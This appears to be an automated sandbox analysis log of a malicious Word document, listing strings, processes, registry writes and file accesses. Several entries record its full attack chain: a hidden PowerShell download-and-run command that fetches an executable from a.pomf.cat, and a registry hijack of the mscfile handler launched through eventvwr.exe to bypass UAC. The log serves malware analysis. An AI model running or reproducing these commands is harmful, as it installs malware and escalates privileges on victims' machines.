Source: powershell.exe | String found in binary or memory: file:// |
Source: WINWORD.EXE, powershell.exe | String found in binary or memory: file:/// |
Source: WINWORD.EXE | String found in binary or memory: file:///c: |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.diagnostics/1.0.0.0__31bf3856ad36 |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.management/1.0.0.0__31bf3856ad364 |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.commands.utility/1.0.0.0__31bf3856ad364e35 |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.consolehost/1.0.0.0__31bf3856ad364e35/micr |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.powershell.security/1.0.0.0__31bf3856ad364e35/microso |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.wsman.management/1.0.0.0__31bf3856ad364e35/microsoft. |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/assembly/gac_msil/system.management.automation/1.0.0.0__31bf3856ad364e35/system.m |
Source: mmc.exe | String found in binary or memory: file:///c:/windows/microsoft.net/framework/v2.0.50727/ |
Source: mmc.exe | String found in binary or memory: file:///c:/windows/system32/ |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowiq |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/ |
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/en-us/system.management.automation.resources/syst |
Source: WINWORD.EXE | String found in binary or memory: ftp:// |
Source: WINWORD.EXE, powershell.exe | String found in binary or memory: http:// |
Source: powershell.exe | String found in binary or memory: http://c |
Source: powershell.exe | String found in binary or memory: http://crl.comod |
Source: powershell.exe | String found in binary or memory: http://crl.comodo.net/ |
Source: powershell.exe | String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q |
Source: powershell.exe | String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06 |
Source: powershell.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0 |
Source: powershell.exe | String found in binary or memory: http://crl.entrust.net/server1.crl0 |
Source: powershell.exe | String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0 |
Source: powershell.exe | String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0 |
Source: powershell.exe | String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0) |
Source: powershell.exe | String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$ |
Source: powershell.exe | String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0 |
Source: WINWORD.EXE | String found in binary or memory: http://ns.d88 |
Source: powershell.exe | String found in binary or memory: http://ocs |
Source: powershell.exe | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: powershell.exe | String found in binary or memory: http://ocsp.comodoca.com0% |
Source: powershell.exe | String found in binary or memory: http://ocsp.comodoca.com0- |
Source: powershell.exe | String found in binary or memory: http://ocsp.comodoca.com0/ |
Source: powershell.exe | String found in binary or memory: http://ocsp.comodoca.com05 |
Source: powershell.exe | String found in binary or memory: http://ocsp.entrust.net03 |
Source: powershell.exe | String found in binary or memory: http://ocsp.entrust.net0d |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter |
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponseh |
Source: WINWORD.EXE | String found in binary or memory: http://ww. |
Source: powershell.exe | String found in binary or memory: http://www.digicert.com.my/cps.htm02 |
Source: powershell.exe | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0 |
Source: powershell.exe | String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0 |
Source: powershell.exe | String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0 |
Source: mmc.exe | String found in binary or memory: http://www.usertrust.com |
Source: powershell.exe | String found in binary or memory: http://www.usertrust.com1 |
Source: WINWORD.EXE | String found in binary or memory: https:// |
Source: powershell.exe | String found in binary or memory: https://a.po |
Source: powershell.exe | String found in binary or memory: https://a.pomf.c |
Source: WINWORD.EXE | String found in binary or memory: https://a.pomf.ca |
Source: powershell.exe | String found in binary or memory: https://a.pomf.cat |
Source: powershell.exe | String found in binary or memory: https://a.pomf.cat/xeufbx.exe |
Source: powershell.exe | String found in binary or memory: https://a.pomf.cat/xeufbx.exeh |
Source: powershell.exe | String found in binary or memory: https://a.pomf.cat/xeufbx.ext |
Source: powershell.exe | String found in binary or memory: https://a.pomf8n# |
Source: powershell.exe | String found in binary or memory: https://secure.comodo.com/cps0 |
Source: powershell.exe | String found in binary or memory: https://w |
Source: WINWORD.EXE | String found in binary or memory: The actual process step by step (briefly) If you w Facebook pages. equals www.facebook.com (Facebook) |
Source: WINWORD.EXE, ~WRS{7032D191-EDCD-4AEE-82F7-544FBB08647F}.tmp.3044.dr | String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. equals www.facebook.com (Facebook) |
Source: WINWORD.EXE | String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. D4@ equals www.facebook.com (Facebook) |
Source: WINWORD.EXE | String found in binary or memory: *YouTube partnerships equals www.youtube.com (Youtube) |
Source: WINWORD.EXE, zukukm.doc | String found in binary or memory: 3. Make a few videos on YouTube and link them to your blog from the description, generating additional traffic. equals www.youtube.com (Youtube) |
Source: WINWORD.EXE, ~WRS{7032D191-EDCD-4AEE-82F7-544FBB08647F}.tmp.3044.dr | String found in binary or memory: 3. Make a few videos on YouTube and link them to your blog from the description, generating additional traffic. equals www.youtube.com (Youtube) |
Source: WINWORD.EXE | String found in binary or memory: If you have a successful website, you can probably use your traffic to create a successful YouTube channel, which you can monetize instantly through the YouTube partner program. You can also use Youtube You may also give some of your content to educational institutions, community courses and more. equals www.youtube.com (Youtube) |
Source: ~WRS{7032D191-EDCD-4AEE-82F7-544FBB08647F}.tmp.3044.dr | String found in binary or memory: If you have a successful website, you can probably use your traffic to create a successful YouTube channel, which you can monetize instantly through the YouTube partner program. You can also use Youtube for one of the main ways to get website traffic, which is awesome traffic by the way, so you may be able to kill two birds with one stone. equals www.youtube.com (Youtube) |
Source: WINWORD.EXE | String found in binary or memory: If you have a successful website, you can probably use your traffic to create a successful YouTube channel, which you can monetize instantly through the YouTube partner program. You can also use Youtube for one of the main ways to get website traffic, which is awesome traffic by the way, so you may be able to kill two birds with one stone. l equals www.youtube.com (Youtube) |
Source: zukukm.doc | String found in binary or memory: If you have a successful website, you can probably use your traffic to create a successful YouTube channel, which you can monetize instantly through the YouTube partner program. You can also use Youtube for one of the main ways to get website traffic, which is awesome traffic by the way, so you may be able to kill two birds with one stone. p equals www.youtube.com (Youtube) |
Source: WINWORD.EXE, zukukm.doc, ~WRS{7032D191-EDCD-4AEE-82F7-544FBB08647F}.tmp.3044.dr | String found in binary or memory: YouTube partnerships equals www.youtube.com (Youtube) |
Source: WINWORD.EXE | String found in binary or memory: YouTube partnerships l equals www.youtube.com (Youtube) |
Source: WINWORD.EXE, zukukm.doc | String found in binary or memory: YouTube partnerships p equals www.youtube.com (Youtube) |
Source: powershell.exe | String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo) |
Source: powershell.exe | String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo) |
Source: WINWORD.EXE | String found in binary or memory: p3. Make a few videos on YouTube and link them to your blog from the description, generating additional traffic. l equals www.youtube.com (Youtube) |
Source: WINWORD.EXE, zukukm.doc | String found in binary or memory: p3. Make a few videos on YouTube and link them to your blog from the description, generating additional traffic. p equals www.youtube.com (Youtube) |
Source: WINWORD.EXE, zukukm.doc | String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. equals www.facebook.com (Facebook) |
Source: WINWORD.EXE | String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. equals www.facebook.com (Facebook) |
Source: WINWORD.EXE | String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. l equals www.facebook.com (Facebook) |
Source: WINWORD.EXE, zukukm.doc | String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. p equals www.facebook.com (Facebook) |
Source: WINWORD.EXE | String found in binary or memory: s always good to add social media profiles and use social-media automation. You may use tools like the Buffer app and Hootsuite to share content from your blog on your Google+ and Facebook pages. shockvehicleTypes of niche sites Adsense niche sites bvvwykhxynyfthufThe most popular is the Adsense niche sites. People build sites on a particular keyword, keep on adding content and make a passive income from Google Adsense. novelsilkAffiliate niche sites angryfinalThe other types are affiliate niche sites. Basically you promote products from the site and earn commission when a purchase is made. You can go with Amazon, Clickbank or ClickSure to choose a product and promote it. The actual process step by step (briefly) If you wanted to start a niche site, you will start by finding a low competition keyword, buying a domain, and setting up hosting. Obviously, there is a lot to learn. Here is covered a lot of the basic tips to learning about niche sites. biihreqmcxucFind a profitable and converting site egrjcyhgkzq |
Source: WINWORD.EXE | String found in binary or memory: t get any AdSense income or it will be 10 cents a day from the one advertiser with no competition. Bear in mind however that there are general advertisements, for example Chitika can show cameras, computers and other electronic products that may appeal to a general audience and produce enough click through to make it worthwhile. This is a risky venture though since your niche is not relevant to your monetization method, the amount of income you earn will like be very random and inconsistent. desertessayInstead of being particular about choosing only high AdSense CPC keywords, a mindmap of content may be created, which is more like an FAQ. For example: touristweekend? What is [topic] woljucflhogukuwta? How to use/install [topic] ? Advantages and disadvantages of using [topic] ? Important facts about [topic] These were some of the basic ideas to get started with before getting into detailed keyword research. SEMRUSHmight be used to find keywords. Additional steps to make your niche blog a true dollarextractor A |
Source: WINWORD.EXE | String found in binary or memory: t mean your website needs to make money directly. If you use your website to attract social media followers, consider sending an sporadic paid advertisement to your followers for some extra profit. argueinsaneSell links Everyone needs to earn money and sometimes selling a link can help pay the bills.This is a great way to make money from your website but you must weigh up the value of your links before doing so. Placing text links into your site for money is a great way to actually prove that your site can make money. Sub-domain joint venture A special version of co-branding (or a joint venture) where you create a sub-domain on your site dedicated to a specific product; the sub-domain is typically run by the advertiser or your joint venture partner lowottfvllxboflfurnacesniffYouTube partnerships illnessperfectIf you have a successful website, you can probably use your traffic to create a successful YouTube channel, which you can monetize instantly through the YouTube partner program. You can also use Youtube |
Source: powershell.exe | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\luketaylor\AppData |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\luketaylor\AppData\Roaming |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\luketaylor |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\luketaylor\AppData\Roaming\Microsoft |
Source: | Binary string: indows\MMCEx.pdbpdbCEx.pdb source: mmc.exe |
Source: | Binary string: C:\Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35\MMCEx.pdb source: mmc.exe |
Source: | Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE |
Source: | Binary string: mscorrc.pdb source: powershell.exe, mmc.exe |
Source: | Binary string: C:\Windows\dll\MMCEx.pdb source: mmc.exe |
Source: | Binary string: C:\Windows\MMCEx.pdb source: mmc.exe |
Source: | Binary string: G:\o14\65_VC8\VBE6\legovbe\vbe7.pdbV source: WINWORD.EXE |
Source: | Binary string: G:\o14\65_VC8\VBE6\legovbe\vbe7.pdb source: WINWORD.EXE |
Source: | Binary string: C:\Windows\symbols\dll\MMCEx.pdb source: mmc.exe |
Source: | Binary string: x.pdb source: mmc.exe |
Source: C:\Windows\System32\cmd.exe | Console Write: ........1#........... ..0.......E.GJ........1#......@FJJ. ..0.....5.....V.GJ............0..........v........`.....,..... |
Source: C:\Windows\System32\reg.exe | Console Write: ........a..v..0.....\...d.......P.............................>w............x.......,."..&..............h...$........... |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp |
Source: C:\Windows\System32\mmc.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll |
Source: C:\Windows\System32\mmc.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp |
Source: C:\Windows\System32\mmc.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Source: unknown | Process created: C:\Windows\System32\cmd.exe |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: unknown | Process created: C:\Windows\System32\reg.exe |
Source: unknown | Process created: C:\Windows\System32\eventvwr.exe |
Source: unknown | Process created: C:\Windows\System32\mmc.exe |
Source: unknown | Process created: C:\Windows\System32\PING.EXE |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/xeufbx.exe','C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe') & reg add HKCU\Software\Classes\mscfile\shell\open\command /d C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe /f & eventvwr.exe & PING -n 15 127.0.0.1>nul & C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/xeufbx.exe','C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe') |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Classes\mscfile\shell\open\command /d C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\eventvwr.exe eventvwr.exe |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE PING -n 15 127.0.0.1 |
Source: C:\Windows\System32\eventvwr.exe | Process created: C:\Windows\System32\mmc.exe 'C:\Windows\system32\mmc.exe' 'C:\Windows\system32\eventvwr.msc' |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: api-ms-win-appmodel-runtime-l1-1-2.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: api-ms-win-appmodel-runtime-l1-1-0.dll |
Source: C:\Windows\System32\mmc.exe | Section loaded: api-ms-win-appmodel-runtime-l1-1-2.dll |
Source: C:\Windows\System32\mmc.exe | Section loaded: api-ms-win-appmodel-runtime-l1-1-0.dll |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/xeufbx.exe','C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe') & reg add HKCU\Software\Classes\mscfile\shell\open\command /d C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe /f & eventvwr.exe & PING -n 15 127.0.0.1>nul & C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/xeufbx.exe','C:\Users\LUKETA~1\AppData\Local\Temp\System Interrupts.exe') |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\luketaylor\AppData |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\luketaylor\AppData\Roaming |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\luketaylor |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\luketaylor\AppData\Roaming\Microsoft |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3252 | Thread sleep time: -922337203685477s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -922337203685477s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3392 | Thread sleep count: 7281 > 30 |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -20000s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -250s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -172s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -156s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -156s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -78s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -78s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -2000s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -250s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3480 | Thread sleep count: 190 > 30 |
Source: C:\Windows\System32\mmc.exe TID: 3480 | Thread sleep time: -95000s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -1641s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -688s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -1640s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -7266s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -359s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -359s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -8891s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3392 | Thread sleep count: 6945 > 30 |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -8891s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -735s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -344s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -9640s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -9640s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -360s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -360s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -17750s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -17750s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -1500s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -1125s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -1125s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -19250s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -9625s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3420 | Thread sleep time: -60000s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -9609s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -391s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -391s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -8844s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -8844s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -734s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -406s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -406s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -9594s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -9594s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -390s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -390s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -8860s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3464 | Thread sleep time: -8860s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3480 | Thread sleep time: -500s >= -60s |
Source: C:\Windows\System32\mmc.exe TID: 3420 | Thread sleep time: -60000s >= -60s |
Source: C:\Windows\System32\PING.EXE TID: 3432 | Thread sleep time: -14000s >= -60s |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\eventvwr.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mmc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation |
